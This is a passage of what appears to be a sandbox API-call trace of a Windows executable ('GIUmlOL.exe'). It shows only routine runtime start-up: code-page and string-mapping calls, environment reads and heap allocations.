/fn_id=opj_get_cstr_index" [0227.678] GetACP () returned 0x4e4 [0227.678] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x228) returned 0x4eaca0 [0227.678] IsValidCodePage (CodePage=0x4e4) returned 1 [0227.678] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0227.678] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0227.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0227.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0227.678] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0227.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0227.678] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0227.679] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0227.679] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0227.679] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0227.679] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0227.679] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0227.679] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0227.679] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0227.679] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0227.679] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0227.679] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0227.679] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0227.679] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1000) returned 0x4f70f0 [0227.680] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0227.680] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0227.680] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0227.680] AreFileApisANSI () returned 1 [0227.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0227.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0227.680] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xcc) returned 0x4e4400 [0227.680] GetEnvironmentStringsW () returned 0x4f8100* [0227.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0227.680] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x4e6) returned 0x4f8ae0 [0227.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x4f8ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0227.680] FreeEnvironmentStringsW (penv=0x4f8100) returned 1 [0227.680] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x118) returned 0x4e9ed0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1f) returned 0x4eb950 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2e) returned 0x4e98f0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x31) returned 0x4e4b40 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3c) returned 0x4f0220 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x31) returned 0x4e4b80 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x14) returned 0x4e9c20 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x24) returned 0x4eb2c0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xd) returned 0x4e3fb0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1d) returned 0x4eb980 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x31) returned 0x4e4bc0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x15) returned 0x4e4c00 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x17) returned 0x4e4090 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xe) returned 0x4e25f0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x69) returned 0x4e3eb0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x3e) returned 0x4f0b30 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1d) returned 0x4eb2f0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x48) returned 0x4f0590 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x12) returned 0x4e3f30 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x18) returned 0x4e3f50 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1b) returned 0x4eb9e0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1e) returned 0x4eb7d0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x29) returned 0x4eba20 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x1e) returned 0x4eb320 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x6b) returned 0x4eba60 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x17) returned 0x4e3f70 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xf) returned 0x4ebae0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x16) returned 0x4e8d00 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x2a) returned 0x4f82d0 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x29) returned 0x4f8810 [0227.681] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x12) returned 0x4e8d20 [0227.682] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x21) returned 0x4eb620 [0227.682] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x16) returned 0x4f91e0 [0227.682] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x22) returned 0x4eb710 [0227.682] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x12) returned 0x4f9060 [0227.682] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8ae0 | out: hHeap=0x4e0000) returned 1 [0227.682] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xa3a7) returned 0x4f93e0 [0227.684] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x20) returned 0x4eb740 [0227.684] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xa3a7) returned 0x503790 [0227.685] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f93e0 | out: hHeap=0x4e0000) returned 1 [0227.685] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xfef7) returned 0x50db40 [0227.687] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x40) returned 0x4f0b80 [0227.687] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xfef7) returned 0x51da40 [0227.689] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4eb740 | out: hHeap=0x4e0000) returned 1 [0227.689] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50db40 | out: hHeap=0x4e0000) returned 1 [0227.690] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x450) returned 0x4f8910 [0227.690] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x450) returned 0x52d940 [0227.690] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0227.690] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1ea7) returned 0x52dda0 [0227.690] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xf40) returned 0x4f93e0 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x7a0) returned 0x4fa330 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52dda0 | out: hHeap=0x4e0000) returned 1 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f93e0 | out: hHeap=0x4e0000) returned 1 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xbf0) returned 0x4f93e0 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fa330 | out: hHeap=0x4e0000) returned 1 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x640) returned 0x4f8910 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1247) returned 0x52d940 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f93e0 | out: hHeap=0x4e0000) returned 1 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x520) returned 0x4f8910 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x1b56) returned 0x4f93e0 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x8a0) returned 0x52d940 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x28ed) returned 0x4faf40 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f93e0 | out: hHeap=0x4e0000) returned 1 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x550) returned 0x4f8910 [0227.691] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x2537) returned 0x52d940 [0227.691] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x12b7) returned 0x4f93e0 [0227.692] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x950) returned 0x4fd840 [0227.692] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.692] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f93e0 | out: hHeap=0x4e0000) returned 1 [0227.692] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x3d4f) returned 0x4fe1a0 [0227.692] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4faf40 | out: hHeap=0x4e0000) returned 1 [0227.692] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fd840 | out: hHeap=0x4e0000) returned 1 [0227.692] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x2377) returned 0x52d940 [0227.692] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x11d7) returned 0x501f00 [0227.693] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x8e0) returned 0x4f93e0 [0227.693] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x52d940 | out: hHeap=0x4e0000) returned 1 [0227.693] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x501f00 | out: hHeap=0x4e0000) returned 1 [0227.693] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f93e0 | out: hHeap=0x4e0000) returned 1 [0227.693] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x5b0) returned 0x4f8910 [0227.693] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f8910 | out: hHeap=0x4e0000) returned 1 [0227.693] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x640) returned 0x4f8910 [0227.693] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x5be2) returned 0x50db40 [0227.694] 